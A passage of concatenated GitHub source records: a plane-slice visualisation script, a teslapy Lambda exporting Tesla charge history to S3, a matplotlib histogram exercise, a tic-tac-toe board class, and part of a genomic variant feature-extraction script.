+ str(timestep)\n else: tstep = str(timestep) \n filename = \"multifield.0\" + tstep + \".txt\"\n \n temp_list = []\n temp_list.append(filename)\n temp_list.append(prop_name)\n temp_list.append(planeEq)\n temp_list.append([minLim, maxLim])\n\n arguments.append(temp_list)\n\n for args in arguments:\n GraphCreator(args)\n\ndef crossproduct(A, B):\n x = A[1]*B[2] - A[2]*B[1]\n y = - A[0]*B[2] + A[2]*B[0]\n z = A[0]*B[1] - A[1]*B[0]\n return [x,y,z]\n\ndef sub(A,B):\n return [A[0]-B[0], A[1]-B[1], A[2]-B[2]]\n\ndef GetPlaneEq(Point1, Point2, Point3):\n B_A = sub(Point2, Point1)\n C_A = sub(Point3, Point1)\n\n CP = crossproduct(B_A, C_A)\n\n k = lambda a : a[0]*Point1[0] + a[1]*Point1[1] + a[2]*Point1[2]\n D = k(CP)\n CP.append(D)\n return CP\n\n# Example 1 : Plane Parallel to Y axis\nPoint1 = [0,0,247]\nPoint2 = [0,247,247]\nPoint3 = [600,247,0]\nplaneEq_1 = GetPlaneEq(Point1, Point2, Point3)\n\n# print(planeEq_1)\n\n# Example 2 : Completely Arbitrary Plane\nPoint1 = [0,50,0]\nPoint2 = [0,150,247]\nPoint3 = [590,50,0]\nplaneEq_2 = GetPlaneEq(Point1, Point2, Point3)\n\nprint(planeEq_2)\n\n# Example 3: Plane Parallel to XZ plane\nPoint1 = [0,100,0]\nPoint2 = [0,100,247]\nPoint3 = [600,100,247]\nplaneEq_3 = GetPlaneEq(Point1, Point2, Point3)\n\n# print(planeEq_3)\n\nSliceExtractor(60, \"density\", planeEq_2, -10, 20)\n# SliceExtractor(60, \"density\", planeEq_1, -10, 20)","repo_name":"agam-kashyap/Data-Visualisation-2","sub_path":"SliceExtract.py","file_name":"SliceExtract.py","file_ext":"py","file_size_in_byte":7364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39089259687","text":"import teslapy\nimport boto3\nimport json\nimport time\nimport os\nimport logging\n\nemail_param = os.environ['EMAIL_SSM_PARAM_NAME']\nrefresh_token_param = os.environ['REFRESH_TOKEN_SSM_PARAM'] \nbucket = os.environ['BUCKET_NAME']\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\ns3 = boto3.resource('s3')\n\ndef db_load():\n logger.info('loading cache from s3')\n cache_obj = s3.Object(bucket, 'cache.json')\n response = cache_obj.get()\n body = response.get('Body').read()\n logger.info(f'loaded cache from s3: {body}')\n return json.loads(body)\n \ndef db_dump(cache):\n logger.info('saving cache to s3') \n cache_obj = s3.Object(bucket, 'cache.json')\n cache_obj.put(Body=(bytes(json.dumps(cache).encode('UTF-8'))))\n logger.info('saved cache to s3')\n\ndef handler(event, context):\n ssm_client = boto3.client('ssm')\n email = ssm_client.get_parameter(Name=email_param)['Parameter']['Value']\n refresh_token = ssm_client.get_parameter(Name=refresh_token_param)['Parameter']['Value']\n\n with teslapy.Tesla(email, cache_loader=db_load, cache_dumper=db_dump) as tesla:\n logger.info('refreshing tesla auth')\n try:\n tesla.refresh_token(refresh_token=refresh_token)\n except:\n logger.error('failed to refresh tesla auth')\n exit(1)\n \n logger.info('getting charge history')\n try:\n vehicle = tesla.vehicle_list()[0]\n charge_history = vehicle.get_charge_history()\n except:\n logger.error('failed to retrieve charge history')\n\n logger.info('storing data in s3')\n s3_object_name = f'charge_history/{int(time.time())}_charge_data.json'\n s3_object = s3.Object(bucket, s3_object_name)\n s3_object.put(Body=(bytes(json.dumps(charge_history).encode('UTF-8'))))\n logger.info(f'stored data in {s3_object_name} in bucket {bucket}')\n","repo_name":"cvanlaw/tesla-data-lambda","sub_path":"lambda/src/export_history.py","file_name":"export_history.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35412955051","text":"#!/usr/bin/env python3\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(5)\nstudent_grades = np.random.normal(68, 15, 50)\n\nfig, ax = plt.subplots()\nfig.set_figheight(5)\nfig.set_figwidth(7.5)\nax.hist(student_grades, bins=range(0, 110, 10), linewidth=0.5, edgecolor=\"black\")\nax.set(xlim=(0, 100), ylim=(0, 30), xticks=np.arange(0,100,10))\nplt.title(\"Project A\")\nplt.xlabel(\"Grades\")\nplt.ylabel(\"Number of Students\")\n\nplt.show()\n","repo_name":"IHansen225/holbertonschool-machine_learning","sub_path":"math/plotting/4-frequency.py","file_name":"4-frequency.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5171351037","text":"\"\"\"\nTic-tac-toe board implementation.\n\"\"\"\n\n\nclass TicTacToeBoard:\n \"\"\"\n Tic-tac-toe board with basic play functionality.\n\n Attributes:\n player_1_mark: A string representing the first player's symbol.\n player_2_mark: A string representing the second player's symbol.\n blank_mark: A string representing a blank square symbol.\n _board: A list of lists representing the squares of the board.\n _next_move: A string representing the symbol of the next player to\n move.\n \"\"\"\n\n # Define class attributes for each player's symbol and for a blank square,\n # in case we ever want to change these later.\n player_1_mark = \"X\"\n player_2_mark = \"O\"\n blank_mark = \" \"\n\n def __init__(self):\n \"\"\"\n Create a new, empty TicTacToeBoard.\n \"\"\"\n # Writing the following ensures that each square of the board is\n # independent from each other. Writing something like\n # [[\" \"] * 3] * 3\n # will cause the board to be made up of copies of the same cell,\n # resulting in strange behavior.\n self._board = [[self.blank_mark for _ in range(3)] for _ in range(3)]\n self._next_move = self.player_1_mark\n\n def next_move(self):\n \"\"\"\n Return the symbol (X or O) of the next player to move.\n\n Returns:\n A string representing the next player's mark (X or O).\n \"\"\"\n return self._next_move\n\n def mark(self, row, col):\n \"\"\"\n If possible, mark a given square of the board with the next player's\n move.\n\n Given a row and column index (each 0, 1, or 2), mark the corresponding\n square of the board with the next player's move. Assume that each index\n is within the appropriate bounds. If a player's mark already exists at\n the requested square, raise an error instead.\n\n Args:\n row: An int representing the index of the row of the board to mark.\n col: An int representing the index of the column of the board to\n mark.\n\n Raises:\n ValueError: if the requested square already has a player's mark.\n \"\"\"\n if self.get_square(row, col) != self.blank_mark:\n raise ValueError\n self._board[row][col] = self._next_move\n\n # Change the next player to move here. An alternative would be to\n # calculate the next player to move based on the number of X's and O's\n # on the board, but this is easier.\n self._flip_next_move()\n\n def _flip_next_move(self):\n \"\"\"\n Change the next player to move.\n \"\"\"\n if self._next_move == self.player_1_mark:\n self._next_move = self.player_2_mark\n else:\n self._next_move = self.player_1_mark\n\n def _check_row_win(self, player):\n \"\"\"\n Check whether the given player has won along a row of the board.\n\n Args:\n player: A string representing the player's symbol (X or O).\n\n Returns:\n True if player has won along any row of the board and False\n otherwise.\n \"\"\"\n for row in range(3):\n if self._board[row][0] == self._board[row][1] \\\n == self._board[row][2] == player:\n return True\n return False\n\n def _check_col_win(self, player):\n \"\"\"\n Check whether the given player has won along a column of the board.\n\n Args:\n player: A string representing the player's symbol (X or O).\n\n Returns:\n True if player has won along any column of the board and False\n otherwise.\n \"\"\"\n for col in range(3):\n if self._board[0][col] == self._board[1][col] \\\n == self._board[2][col] == player:\n return True\n return False\n\n def _check_diag_win(self, player):\n \"\"\"\n Check whether the given player has won along a diagonal of the board.\n\n Args:\n player: A string representing the player's symbol (X or O).\n\n Returns:\n True if player has won along a diagonal of the board and False\n otherwise.\n \"\"\"\n # We use trace to refer to the diagonal from the upper left to the lower\n # right of the board.\n trace_win = True\n for i in range(3):\n if self._board[i][i] != player:\n trace_win = False\n break\n # We use trace to refer to the diagonal from the upper right to the\n # lower left of the board.\n cross_win = True\n for i in range(3):\n if self._board[i][2 - i] != player:\n cross_win = False\n break\n return trace_win or cross_win\n\n def check_win(self, player):\n \"\"\"\n Check that a given player has won (has three in a row) anywhere on the\n board.\n\n Args:\n player: A string representing the player's symbol (X or O).\n\n Returns:\n True if player has won and False otherwise.\n \"\"\"\n return (self._check_row_win(player) or self._check_col_win(player)\n or self._check_diag_win(player))\n\n def get_square(self, row, col):\n \"\"\"\n Return the mark at the given square of the board.\n\n Args:\n row: An int representing the index of the row of the board to get.\n col: An int representing the index of the column of the board to\n get.\n\n Returns:\n A string representing the contents of the given square (X, O, or a\n space).\n \"\"\"\n return self._board[row][col]\n\n def __repr__(self):\n \"\"\"\n Return a string representing the contents of the board.\n \"\"\"\n row_divider = \"+-+-+-+\"\n lines = [row_divider]\n for i in range(3):\n row = f\"|{'|'.join(self._board[i])}|\"\n lines.append(row)\n lines.append(row_divider)\n return \"\\n\".join(lines)\n","repo_name":"olincollege/softdes-open","sub_path":"assignments/6-software-architecture-design/tic_tac_toe_board.py","file_name":"tic_tac_toe_board.py","file_ext":"py","file_size_in_byte":6012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7023297678","text":"import pandas as pd\nimport numpy as np\nimport pickle\nfrom collections import defaultdict\nimport os.path\nimport glob\nfrom scipy.stats import entropy\nfrom Bio.SeqUtils.ProtParamData import kd\nfrom dnds_func import seq_ns\nfrom aa_chemical_properties import aa_charge, aa_charge_dict, aa_functional_group, aa_functional_group_dict, aa_propensity,\\\n propensity_chou_fasman, aa_volume_group, aa_volume, aa_volume_group_dict, aa_h_bond_donor, aa_h_bond_acceptor\nfrom ext_predictors_codes import sift_codes, polyphen_codes, clinvar_codes\nfrom calc_exac_freq_func import codon_table\nfrom entropy_func import SE_hist, JSD_background, JSD_hist\n\nfrom dsprint.core import POPULATIONS_ANS, POPULATIONS_ACS\nimport dsprint.data as data\n\n\nSIFT_THRESHOLD = 0.05\n\n# Rare SNP thresholds\nMAFT_5 = 0.005\nMAFT_05 = 0.0005\nMAFT_005 = 0.00005\n\npfam_aa_order = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']\nAMINO_ACIDS = pfam_aa_order + ['*']\n\nHMM_STATES_FOLDER = snakemake.input.hmm_states_folder\nPROB_DICT = snakemake.input.prob_dict\nOUTPUT_CSV = snakemake.output.output_csv\n\n\ndef ExAC_MAF_features(sites_aa_num, sites_aa_alter_num, maf_list):\n\n d = {}\n\n # avg MAF\n d['avg_maf_all'] = 0 if sites_aa_num == 0 else np.sum(maf_list) / float(sites_aa_num)\n\n # avg MAF of all the altered sites\n d['avg_maf_altered'] = 0 if sites_aa_alter_num == 0 else np.sum(maf_list) / float(sites_aa_alter_num)\n\n bins = [0, 0.001, 0.005, 0.01, 0.02, 0.04, 0.06, 0.08, 0.1, 0.2, 0.5]\n non_zero_maf_lst = np.array(maf_list)[np.nonzero(maf_list)[0].tolist()]\n maf_hist = np.histogram(non_zero_maf_lst, bins)[0]\n\n for i, maf_hist_value in enumerate(maf_hist):\n d['maf_hist_' + str(bins[i]) + '-' + str(bins[i + 1])] = maf_hist_value\n\n return d\n\n\ndef ExAC_population_features(pop_maf_list, pop_maf_syn_list, pop_maf_nonsyn_list):\n\n d = {}\n\n for i in range(len(an_str)):\n # populations total maf avg\n d['maf_' + an_str[i][3:]] = 0 if len(pop_maf_list[i]) == 0 else np.average(pop_maf_list[i])\n\n for i in range(len(an_str)):\n # populations syn maf avg\n d['maf_syn_' + an_str[i][3:]] = 0 if len(pop_maf_syn_list[i]) == 0 else np.average(pop_maf_syn_list[i])\n\n for i in range(len(an_str)):\n # populations non-syn maf avg\n d['maf_nonsyn_' + an_str[i][3:]] = 0 if len(pop_maf_nonsyn_list[i]) == 0 else np.average(pop_maf_nonsyn_list[i])\n\n return d\n\n\ndef ExAC_count_features(sites_aa_num, sites_aa_alter_num, sites_snp_num, sites_snp_alter_num):\n\n d = {}\n\n # Feature: number of alterations - aa level (raw and normalized by total number of matched positions)\n d['alter_num_aa'] = sites_aa_alter_num\n d['alter_num_aa_norm'] = 0 if sites_aa_num == 0 else sites_aa_alter_num / float(sites_aa_num)\n\n # Feature: number of alterations - DNA level (raw and normalized by total number of matched positions)\n d['alter_num_snp'] = sites_snp_alter_num\n d['alter_num_snp_norm'] = 0 if sites_snp_num == 0 else sites_snp_alter_num / float(sites_snp_num)\n\n # Feature: average number of poymorphisms at one site\n d['avg_aa_polymorphisms'] = 0 if sites_aa_alter_num == 0 else sites_poly_aa_num / float(sites_aa_alter_num)\n\n # Feature: fraction of altered sites with more than 1 polymorphism\n d['frac_poly_aa'] = 1 if sites_aa_alter_num == 0 else sites_poly_aa_several / float(sites_aa_alter_num)\n\n return d\n\n\ndef ExAC_rareSNP_features(sites_snp_alter_num, rare_5_num, rare_05_num, rare_005_num):\n\n # Feature: fraction of rare SNPs (0.5%, 0.05%, 0.005%)\n return {\n 'rare_poly_0.5': 0 if sites_snp_alter_num == 0 else rare_5_num / float(sites_snp_alter_num),\n 'rare_poly_0.05': 0 if sites_snp_alter_num == 0 else rare_05_num / float(sites_snp_alter_num),\n 'rare_poly_0.005': 0 if sites_snp_alter_num == 0 else rare_005_num / float(sites_snp_alter_num)\n }\n\n\ndef conservation_features(phastCons_dict, phyloP_dict):\n\n d = {}\n positions = 1, 2, 3 # codon positions\n\n phastCons = np.vstack(phastCons_dict[p] for p in positions)\n phyloP = np.vstack(phyloP_dict[p] for p in positions)\n\n # conservation scores avg for each codon position\n phastCons_mean = np.nanmean(phastCons, axis=1)\n for p in positions:\n d[f'phastCons{p}_avg'] = phastCons_mean[p-1]\n\n phyloP_mean = np.nanmean(phyloP, axis=1)\n for p in positions:\n d[f'phyloP{p}_avg'] = phyloP_mean[p-1]\n\n # Features: conservation scores histograms for each codon position - phastCons\n phastCons_bins = np.concatenate((np.linspace(0, 0.75, 4), np.linspace(0.8, 1.0, 5)), axis=0)\n for p in positions:\n hist, _ = np.histogram(phastCons[p-1, :], phastCons_bins)\n for i, hist_value in enumerate(hist):\n d[f'phastCons{p}_hist_{phastCons_bins[i]}-{phastCons_bins[i+1]}'] = hist_value\n\n # Features: conservation scores histograms for each codon position - phyloP\n phyloP_bins = np.concatenate((np.array([-14, -1]), np.linspace(0, 3, 4), np.linspace(3.5, 6, 6)), axis=0)\n for p in positions:\n hist, _ = np.histogram(phyloP[p-1, :], phyloP_bins)\n for i, hist_value in enumerate(hist):\n d[f'phyloP{p}_hist_{phyloP_bins[i]}-{phyloP_bins[i+1]}'] = hist_value\n\n # Features: histogram of avg in each codon\n phastCons_codons_avg = np.nanmean(phastCons, axis=0)\n hist, _ = np.histogram(phastCons_codons_avg, phastCons_bins)\n for i, hist_value in enumerate(hist):\n d[f'phastCons_codons_hist_{phastCons_bins[i]}-{phastCons_bins[i+1]}'] = hist_value\n\n phyloP_codons_avg0 = np.nanmean(phyloP, axis=0)\n hist, _ = np.histogram(phyloP_codons_avg0, phyloP_bins)\n for i, hist_value in enumerate(hist):\n d[f'phyloP_codons_hist_{phyloP_bins[i]}-{phyloP_bins[i+1]}'] = hist_value\n\n return d\n\n\ndef sub_matrix_features(sub_list, weigted_sub_list, sub_name):\n if len(sub_list) == 0:\n sub_avg = weigted_sub_avg = sub_postivies = sub_negatives = sub_ratio = 1\n else:\n # Feature: BLOSUM62 average and frequency weighted-average\n sub_avg = sum(sub_list) / float(len(sub_list))\n weigted_sub_avg = sum(weigted_sub_list) / float(len(weigted_sub_list))\n\n # Feature: BLOSUM62 count of positives and negatives\n sub_postivies = sum(1 for x in sub_list if x > 0)\n sub_negatives = sum(1 for x in sub_list if x < 0)\n\n # Feature: BLOSUM62 positives/negatives ratio\n if sub_postivies == 0 or sub_negatives == 0:\n sub_ratio = 0\n else:\n sub_ratio = sub_postivies / float(sub_negatives)\n\n return {\n f'{sub_name}_avg': sub_avg,\n f'{sub_name}_avg_weighted': weigted_sub_avg,\n f'{sub_name}_positive_num': sub_postivies,\n f'{sub_name}_negative_num': sub_negatives,\n f'{sub_name}_ratio': sub_ratio\n }\n\n\ndef SIFT_features(sift_scores_list, weighted_sift_scores_list):\n if len(sift_scores_list) > 0:\n # Feature: SIFT average\n sift_avg = np.mean(sift_scores_list)\n\n # Feature: weighted (by frequency) SIFT average\n sift_w_avg = np.mean(weighted_sift_scores_list)\n\n # Feature: SIFT number of deleterious (score <=0.05)\n sift_deleterious_num = sum(1 for x in sift_scores_list if x <= SIFT_THRESHOLD)\n\n # Feature: SIFT number of tolerated (score > 0.05)\n sift_tolerated_num = sum(1 for x in sift_scores_list if x > SIFT_THRESHOLD)\n\n # Feature: deleterious/tolerated ratio\n if sift_tolerated_num == 0 or sift_deleterious_num == 0:\n sift_ratio = 0\n else:\n sift_ratio = sift_deleterious_num / float(sift_tolerated_num)\n\n # Feature: SIFT \"majority-decision\" (deleterious/tolerated)\n if sift_deleterious_num > sift_tolerated_num:\n sift_majority = sift_codes.SIFT_DELETERIOUS.value\n elif sift_tolerated_num > sift_deleterious_num:\n sift_majority = sift_codes.SIFT_TOLERATED.value\n else:\n sift_majority = sift_codes.SIFT_TIE.value\n\n else:\n sift_avg = sift_w_avg = -1\n sift_deleterious_num = 0\n sift_tolerated_num = 0\n sift_ratio = 1\n sift_majority = sift_codes.SIFT_TIE.value\n\n return {\n 'sift_avg': sift_avg,\n 'sift_avg_weighted': sift_w_avg,\n 'sift_deleterious_num': sift_deleterious_num,\n 'sift_tolerated_num': sift_tolerated_num,\n 'sift_ratio': sift_ratio,\n 'sift_majority': sift_majority\n }\n\n\ndef PolyPhen_features(polyphen_scores_list, polyphen_pred_list, weighted_polyphen_scores_list):\n if len(polyphen_scores_list) > 0:\n # Feature: PolyPhen average\n polyphen_avg = np.mean(polyphen_scores_list)\n\n # Feature: weighted (by frequency) PolyPhen average\n polyphen_w_avg = np.mean(weighted_polyphen_scores_list)\n\n # Feature: polyPhen number of benign\n polyphen_benign_num = polyphen_pred_list.count(\"benign\")\n\n # Feature: polyPhen number of possibly_damaging\n polyphen_possibly_num = polyphen_pred_list.count(\"possibly_damaging\")\n\n # Feature: polyPhen number of probably_damaging\n polyphen_probably_num = polyphen_pred_list.count(\"probably_damaging\")\n\n # Feature: polyPhen \"majority-decision\" (benign/possibly_damaging/probably_damaging/unknown)\n if ((polyphen_benign_num > polyphen_probably_num and polyphen_benign_num > polyphen_possibly_num) or\n (polyphen_benign_num > polyphen_probably_num and polyphen_benign_num == polyphen_possibly_num)):\n polyphen_majority = polyphen_codes.POLYPHEN_BENIGN.value\n\n elif ((polyphen_probably_num > polyphen_benign_num and polyphen_probably_num > polyphen_possibly_num) or\n (polyphen_probably_num > polyphen_benign_num and polyphen_probably_num == polyphen_possibly_num)):\n polyphen_majority = polyphen_codes.POLYPHEN_PROBABLY.value\n\n elif polyphen_possibly_num > polyphen_benign_num and polyphen_possibly_num > polyphen_probably_num:\n polyphen_majority = polyphen_codes.POLYPHEN_POSSIBLY.value\n\n elif polyphen_benign_num == polyphen_probably_num == polyphen_possibly_num:\n polyphen_majority = polyphen_codes.PLOYPHEN_EQUAL.value\n\n else:\n polyphen_majority = polyphen_codes.POLYPHEN_UNKNOWN.value\n\n else:\n polyphen_avg = polyphen_w_avg = -1\n polyphen_benign_num = 0\n polyphen_possibly_num = 0\n polyphen_probably_num = 0\n polyphen_majority = polyphen_codes.POLYPHEN_UNKNOWN.value\n\n return {\n 'polyphen_avg': polyphen_avg,\n 'polyphen_avg_weighted': polyphen_w_avg,\n 'polyphen_benign_num': polyphen_benign_num,\n 'polyphen_possibly_num': polyphen_possibly_num,\n 'polyphen_probably_num': polyphen_probably_num,\n 'polyphen_majority': polyphen_majority\n }\n\n\ndef ClinVar_scores(clinsig_list, clinsig_af):\n valid_scores = []\n valid_scores_weighted = []\n\n for i in range(len(clinsig_list)):\n sig = clinsig_list[i]\n sig_list = pd.Series(sig.split(\"&\")).unique().tolist()\n # Skipping\n if \"not\" in sig_list or \"\" in sig_list:\n continue\n\n # Determine the alteration clinvar score\n if len(sig_list) == 1 and sig_list[0] == \"pathogenic\":\n score = clinvar_codes.CLINVAR_PATHOGENIC.value\n elif len(sig_list) == 1 and sig_list[0] == \"benign\":\n score = clinvar_codes.CLINVAR_BENIGN.value\n elif len(sig_list) == 2 and \"benign\" in sig_list and \"likely\" in sig_list:\n score = clinvar_codes.CLINVAR_LIKELY_BENIGN.value\n elif len(sig_list) == 2 and \"pathogenic\" in sig_list and \"uncertain\" in sig_list:\n score = clinvar_codes.CLINVAR_LIKELY_PATHOGENIC.value\n elif len(sig_list) == 2 and \"pathogenic\" in sig_list and \"other\" in sig_list:\n score = clinvar_codes.CLINVAR_PATHOGENIC_OTHER.value\n else:\n score = clinvar_codes.CLINVAR_UNCERTAIN.value # value of 0\n\n valid_scores.append(score)\n score_af = clinsig_af[i]\n valid_scores_weighted.append(score * score_af)\n\n # ===Feature: Avg. and weighted avg. ClinVar score===#\n if len(valid_scores) == 0:\n avg_clinvar_score = 0\n avg_w_clinvar_score = 0\n else:\n avg_clinvar_score = np.mean(valid_scores)\n avg_w_clinvar_score = np.mean(valid_scores_weighted)\n\n return {\n 'avg_clinvar_score': avg_clinvar_score,\n 'avg_clinvar_weighted': avg_w_clinvar_score\n }\n\n\ndef entropy_features(maf_list):\n # Calculates a normalized Shannon entropy (from Miller et al, 2015) of nonsyn SNPs distributed across instances\n maf = np.array(maf_list)\n if np.sum(maf) == 0:\n # if no SNPs- each instance has the prob. = max. entropy ln(n)\n e = np.log(len(maf))\n else:\n # Filter out nans; scipy.stats.entropy automatically normalizes the input\n # We divide the result by ln(|x|) to account for different sized inputs\n e = entropy(maf[~np.isnan(maf)]) / np.log(len(maf))\n\n return {'snp_nonsyn_entropy': e}\n\n\ndef pseudo_dNdS_features(ref_seq, Nd, Sd):\n N, S = seq_ns(ref_seq) # Reference expected syn/nonsyn per site\n PN = 0 if N == 0 else Nd / float(N) # Proportion of nonsyn\n PS = 0 if S == 0 else Sd / float(S) # Proportion of syn\n\n # num of nonsyn substitutions per nonsyn site\n dN = -0.75 * (np.log(1 - 4 * PN / float(3)))\n\n # num of syn substitutions per syn site\n if 4 * PS / float(3) >= 1:\n dS = 1\n else:\n dS = -0.75 * (np.log(1 - 4 * PS / float(3)))\n\n if dN == 0 or dS == 0:\n dN_dS = 1 # There isn't enough information to calculate dN/dS (1 is a neutral value)\n else:\n dN_dS = dN / dS\n if dN_dS == np.nan:\n dN_dS = 1 # There isn't enough information to calculate dN/dS (1 is a neutral value)\n\n return {\n 'pseudo_nonsyn': dN,\n 'pseudo_syn': dS,\n 'pseudo_dNdS': dN_dS\n }\n\n\ndef pfam_emission_prob_features(hmm_prob_dict, state):\n # Max. emission probability + emission prob. for each amino acid\n probs = hmm_prob_dict[state]\n d = {'pfam_prob_max': max(probs)}\n d.update({f'pfam_prob_{pfam_aa_order[i]}': prob for i, prob in enumerate(probs)})\n return d\n\n\ndef pfam_conserved_state_feature(state, con_states_dict):\n # is state is conserved according to Pfam?\n return {'is_pfam_conserved': state in con_states_dict}\n\n\ndef instance_individuals_100way_change_features(maf_list, aa_ref_hist, jsd100way_list):\n\n # Computing Orthologus conservation in different ways (from 100way-ucsc alignment)\n # Computing Paralogus conservartion in different ways (from different instances)\n # Combining both to measurments that maximize ortho. con. and minimize para. con.\n\n ## Paralogus ##\n\n # fraction of change across instances\n\n # determine majority aa (index of one of the majority)\n minor_counts = 0\n max_pos = aa_ref_hist.index(max(aa_ref_hist))\n for i in range(len(aa_ref_hist)):\n if i == max_pos:\n continue\n minor_counts += aa_ref_hist[i]\n\n instances_change_frac = minor_counts / float(np.sum(aa_ref_hist))\n\n # Feature: entropy of ref AA\n aa_ref_entropy = SE_hist(aa_ref_hist)\n\n # JSD of ref AA\n aa_ref_jsd = JSD_hist(aa_ref_hist, background=JSD_background.BLOSUM62)\n\n ## Orthologus ##\n\n # first remove -1 illegal scores of JSD mismatch (positions where JSD alignment didn't match, I added -1):\n jsd100way_list_no_mismatch = [i for i in jsd100way_list if i != -1]\n\n # median JSD score across 100way vertbrates\n med_jsd = 0 if len(jsd100way_list_no_mismatch) == 0 else np.median(jsd100way_list_no_mismatch)\n\n # Histogram of JSD score across 100way vertebrates\n jsd_median_bins = [0, 0.5, 0.6, 0.7, 0.8, 1]\n jsd_median_hist = np.histogram(jsd100way_list_no_mismatch, bins=jsd_median_bins)[0]\n\n # Functional measurements of both\n # ratio: change across instances / change across individuals(MAF)\n\n # low MAF (orthologues), high instances change (paralogous) = SDPs\n if np.sum(maf_list) == 0:\n avg_maf_overall = 0.0000001 # set the minimal non-zero in our data\n else:\n avg_maf_overall = np.sum(maf_list) / float(len(maf_list))\n\n max_entropy = SE_hist([0] * len(AMINO_ACIDS))\n\n return dict(\n [\n ('instances_change_frac', instances_change_frac),\n ('aa_ref_SE', aa_ref_entropy),\n ('aa_ref_jsd', aa_ref_jsd),\n ('med_jsd_100way_blosum', med_jsd)\n ] +\n [\n (f'jsd_median_hist_{jsd_median_bins[i]}-{jsd_median_bins[i + 1]}', jsd_median_hist[i])\n for i in range(len(jsd_median_bins) - 1)\n ] +\n [\n ('instances_individuals_change_ratio', instances_change_frac / float(avg_maf_overall)),\n\n # high JSD (orthologues), high instances change (paralogous) = SDPs\n # we want high MAF -> small 1 - MAF, high JSD\n ('jsd_100way_instances_major_ratio', med_jsd / float(1 - instances_change_frac)),\n\n # high JSD (orthologues), high shannon entropy (paralogous) = SDPs\n ('jsd_mul_aa_ref_SE', med_jsd * aa_ref_entropy),\n\n # high JSD (orthologues), low diff. of max SE to shannon entropy (paralogous) = SDPs\n ('jsd_SE_diff_ratio', med_jsd / float(max_entropy - aa_ref_entropy)),\n\n # high JSD (orthologues), high shannon entropy (paralogous) = SDPs\n ('jsd_SE_sum', med_jsd + (aa_ref_entropy / float(max_entropy))),\n\n # high shannon entropy (paralogous), low diff. of max JSD to avg JSD (orthologues) = SDPs\n ('SE_jsd_diff_ratio', aa_ref_entropy / float(1 - med_jsd)),\n\n # high JSD (orthologues), low JSD (paralogoues) = SDPs\n ('jsds_ratio', med_jsd / float(aa_ref_jsd)),\n\n # high difference between orthoulogus (more conserved) and paralogous (less conserved)\n ('jsds_subtraction', med_jsd - aa_ref_jsd)\n ]\n\n )\n\n\ndef aa_identity_features(aa_ref_hist, type_str):\n # aa identity histogram and probability\n if np.sum(aa_ref_hist) == 0:\n aa_ref_prob = aa_ref_hist\n else:\n aa_ref_prob = np.asarray(aa_ref_hist) / float(np.sum(aa_ref_hist))\n\n d = {f'{type_str}_hist_{aa}': aa_ref_hist_i for aa, aa_ref_hist_i in zip(AMINO_ACIDS, aa_ref_hist)}\n d.update({f'{type_str}_prob_{aa}': aa_ref_prob_i for aa, aa_ref_prob_i in zip(AMINO_ACIDS, aa_ref_prob)})\n return d\n\n\ndef major_allele_charge(aa_ref_hist):\n # ===Feature: major allele aa charge counts===#\n charge_positive_count = charge_negative_count = charge_neutral_count = 0\n for i in range(len(AMINO_ACIDS)):\n aa_count = aa_ref_hist[i]\n if aa_count > 0:\n charge = aa_charge_dict[AMINO_ACIDS[i]]\n if charge.value == 0:\n charge_neutral_count += aa_count\n elif charge.value == 1:\n charge_positive_count += aa_count\n else:\n charge_negative_count += aa_count\n\n # ===Feature: major allele majority charge===#\n charge_majority = aa_charge.NEUTRAL.value\n if charge_positive_count > charge_neutral_count and charge_positive_count > charge_negative_count:\n charge_majority = aa_charge.POSITIVE.value\n elif charge_negative_count > charge_neutral_count and charge_negative_count > charge_positive_count:\n charge_majority = aa_charge.NEGATIVE.value\n\n return {\n 'aa_ref_charge_positive_count': charge_positive_count,\n 'aa_ref_charge_negative_count': charge_negative_count,\n 'aa_ref_charge_neutral_count': charge_neutral_count,\n 'aa_ref_charge_majority': charge_majority\n }\n\n\ndef major_allele_functional_group(aa_ref_hist):\n # major allele aa functional group counts\n func_counters = [0] * (len(aa_functional_group) - 1) # Major allele is never a stop codon\n for i in range(len(AMINO_ACIDS)):\n aa_count = aa_ref_hist[i]\n if aa_count > 0:\n func_group_num = aa_functional_group_dict[\n AMINO_ACIDS[i]].value # getting numeric functional group value\n if func_group_num == aa_functional_group.STOP.value: # Major allele is never a stop codon\n continue\n func_counters[func_group_num] += aa_count\n\n return {\n k: v for k, v in zip(\n [f'aa_ref_{group}_count' for group in aa_functional_group if group != aa_functional_group.STOP],\n func_counters\n )\n }\n\n\ndef sub_diff_functional_group(ref_alt_pairs):\n # ===Features: count and frequency staying in functional group Vs. moving to other group===#\n stay_cnt = stay_cnt_freq = move_cnt = move_cnt_freq = 0\n\n for (ref, alt, af) in ref_alt_pairs:\n ref_func_group = aa_functional_group_dict[ref].value\n alt_func_group = aa_functional_group_dict[alt].value\n if ref_func_group == alt_func_group:\n stay_cnt += 1\n stay_cnt_freq += af\n else:\n move_cnt += 1\n move_cnt_freq += af\n\n # ===Features: functional groups transitions counts===#\n transitions_vec_size = (len(aa_functional_group) - 1) * len(\n aa_functional_group) # excluding transitions from STOP codons\n transitions_vec = [0] * transitions_vec_size\n\n for (ref, alt, af) in ref_alt_pairs:\n ref_func_group = aa_functional_group_dict[ref].value\n alt_func_group = aa_functional_group_dict[alt].value\n # Calculate counter position on the vector (ref_func_group is never STOP = 5)\n trans_vec_i = ref_func_group * (len(aa_functional_group) - 1)\n trans_vec_i += alt_func_group\n transitions_vec[trans_vec_i] += 1\n\n keys = [f'sub_func_group_trans_{i}-{j}' for i in range(len(aa_functional_group) - 1) for j in range(len(aa_functional_group))]\n\n return dict([\n ('sub_func_group_stay_cnt', stay_cnt),\n ('sub_func_group_stay_freq', stay_cnt_freq),\n ('sub_func_group_move_cnt', move_cnt),\n ('sub_func_group_move_freq', move_cnt_freq)\n ] + [(k, v) for k, v in zip(keys, transitions_vec)])\n\n\ndef major_allele_hydrophobicity(aa_ref_hist):\n # major allele hydrophicity average, 